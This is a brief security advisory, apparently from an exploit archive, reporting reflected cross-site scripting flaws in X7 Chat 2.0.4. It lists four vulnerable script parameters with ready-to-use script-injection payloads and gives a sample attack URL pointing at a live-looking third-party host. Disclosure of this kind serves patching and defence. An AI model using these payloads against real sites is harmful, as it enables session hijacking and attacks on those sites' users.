X7 Chat version 2.0.4 is susceptible to cross site scripting vulnerabilities.
a0ca12b0a2389ec279ddab91b583c6334056fc19fb37e28affce8a95f4e138a3
~~~~~~~~~~~~~~~~~~~~~~~~~~~~
~ X7 Chat 2.0.4 XSS ~
~~~~~~~~~~~~~~~~~~~~~~~~~~~~
----------
Author : ShAy6oOoN
----------
Group : PitBull Crew
----------
Script : X7 Chat 2.0.4
----------
Download : http://www.x7chat.com/releases/v2/x7chat2_0_5.zip
----------
Vuln Type: XSS
----------
Register_globals: ON
-----------------
/path/upgradev1.php?INSTALL_X7CHATVERSION=<script>alert(123);</script>
/path/help/index.php?theme_c=<script>alert(123);</script>
Register_globals: OFF
-----------------
/path/help/index.php?theme_c=<script>alert(123);</script>
/path/sources/frame.php?room=<script>alert(123);</script>
Example:
--------
http://kyalla.gotdns.com/users/test/html/x7chat/help/index.php?theme_c=<script>alert
(123);</script>
Greetings:
----------
PitBull Crew : The_PitBull - iNs - c0ol - Raz0r - Inphex
Regards To:
----------
Egyptian Crew : SadSouL